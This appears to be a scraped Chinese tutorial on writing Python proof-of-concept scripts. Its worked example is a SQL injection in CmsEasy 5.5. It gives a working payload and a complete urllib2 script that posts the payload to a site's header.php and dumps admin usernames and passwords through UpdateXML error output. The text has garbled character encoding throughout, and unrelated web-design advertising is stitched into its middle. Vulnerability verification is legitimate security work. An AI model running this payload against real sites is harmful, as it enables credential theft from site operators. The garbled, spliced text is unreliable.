已完本玄幻小说排行榜,完结小说排行榜

新聞中心

這里有您想知道的互聯(lián)網(wǎng)營銷解決方案

創(chuàng)新互聯(lián)Python教程：python poc是什么

如今，PoC 的編寫在我們安全研究團隊是每個人必備的技能之一。那么，PoC是什么呢？我們應該如何優(yōu)雅的來進行編寫？

成都一家集口碑和實力的網(wǎng)站建設服務商，擁有專業(yè)的企業(yè)建站團隊和靠譜的建站技術(shù)，十余年企業(yè)及個人網(wǎng)站建設經(jīng)驗 ,為成都超過千家客戶提供網(wǎng)頁設計制作,網(wǎng)站開發(fā),企業(yè)網(wǎng)站制作建設等服務,包括成都營銷型網(wǎng)站建設，高端網(wǎng)站設計，同時也為不同行業(yè)的客戶提供成都網(wǎng)站設計、成都做網(wǎng)站的服務,包括成都電商型網(wǎng)站制作建設,裝修行業(yè)網(wǎng)站制作建設，傳統(tǒng)機械行業(yè)網(wǎng)站建設,傳統(tǒng)農(nóng)業(yè)行業(yè)網(wǎng)站制作建設。在成都做網(wǎng)站,選網(wǎng)站制作建設服務商就選創(chuàng)新互聯(lián)公司。

0x00 我們需要掌握的幾個的概念

PoC（全稱：Proof of Concept）中文意思是“觀點證明”。在安全行業(yè)中PoC則是一段驗證漏洞的程序，使我們能夠確認這個漏洞是真實存在的。

python，是一種面向?qū)ο蟆⒔忉屝陀嬎銠C程序設計語言。常見的一些庫我們需要了解，比如：urllib，urllib2，re，request，socket等，本文我們要使用Python這門語言，Python的基礎知識我們不做講解。

SQL Injection，通過把SQL命令插入到Web表單遞交或輸入域名或頁面請求的查詢字符串，最終達到欺騙服務器執(zhí)行惡意的SQL命令。

0x01 PoC編寫流程

場景還原：某網(wǎng)站托管公司，旗下托管了數(shù)萬個站點，負責這些站點的安全，但是突然某一天，某知名CMS程序被爆出存在一個高危的SQL注入，某網(wǎng)管排查后發(fā)現(xiàn)旗下托管網(wǎng)站中存在幾百個站點使用該CMS程序，那么一個一個去排查是否存在該漏洞是非常繁瑣的，所以，我們需要一個PoC來驗證下。

·根據(jù)該漏洞詳情的描述，假設已知出現(xiàn)漏洞的CMS版本號為4.1，可以去其官網(wǎng)或者GitHub上去下載相對應的版本。

·下載之后，模擬其服務器真實環(huán)境，本地進行搭建。根據(jù)漏洞描述，進行復現(xiàn)，已SQL注入為例，重復提交不同的參數(shù)，觀察不同的返回結(jié)果，同時注意如果該漏洞不存在出現(xiàn)的結(jié)果。

·根據(jù)漏洞復現(xiàn)的實際情況，進行PoC的編寫。

·PoC寫完之后需要進行相關的測試，已確保該PoC的編寫沒有問題，比如測試靶機程序，以及不存在漏洞的程序。

0x02 SQL Injection poc編寫

已知CmsEasy 5.5 UTF-8程序存在SQL注入，烏云漏洞中的漏洞細節(jié)比較詳細

（由于wooyun已經(jīng)暫停訪問，故不上鏈接了）。

·首先，我們需要下載其相關源碼，進行本地搭建。

閱讀漏洞細節(jié)，我們得知其url與payload如下：

URL：http://xxx.xxx/celive/live/header.php Payload:xajax=LiveMessage&xajaxargs[0]=name',(UpdateXML(1,CONCAT(0x5b,mid((SELECT/**/GROUP_CONCAT(concat(username,'|',password)) from cmseasy_user),1,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)--%20

·漏洞復現(xiàn)：我們根據(jù)其漏洞描述，進行復現(xiàn)，該注入點需要發(fā)起一個Post請求，我們使用Firefox瀏覽器配合hackbar插件進行復現(xiàn)，填入url與payload，發(fā)送，獲取其賬戶密碼。

漏洞效果如下：

這樣，我們的漏洞就已經(jīng)復現(xiàn)成功了。接下來，我們來寫Poc。

#!/usr/bin/env python
# coding:utf-8
import urllib2
import urllib
import re
import sys
def verify(url):
target = '%s/celive/live/header.php' % url
#需要發(fā)送的數(shù)據(jù)
post_data = {
'xajax': 'LiveMessage',
'xajaxargs[0]': "name',(UpdateXML(1,CONCAT(0x5b,mid((SELECT/**/GROUP_CONCAT(concat(username,'|',password)) from cmseasy_user),1,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)-- " }
try:
#發(fā)送請求
req = urllib2.Request(target, data=urllib.urlencode(post_data))
response = urllib2.urlopen(req)
#處理請求，進行判斷
if response:
data = response.read()
if "XPATH syntax error" in data:
print "%s is vulnerable" % target
else:
print "%s is not vulnerable" % target

except Exception, e:
print "Something happend..."
print e
def main():
args = sys.argv
url = ""
if len(args) == 2:
url = args[1]
verify(url)
else:
print "Usage: python %s url" % (args[0])
if __name__ == '__main__':
main()

文章題目：創(chuàng)新互聯(lián)Python教程：python poc是什么
當前網(wǎng)址：http://m.fisionsoft.com.cn/article/dhcepih.html

新聞中心

其他資訊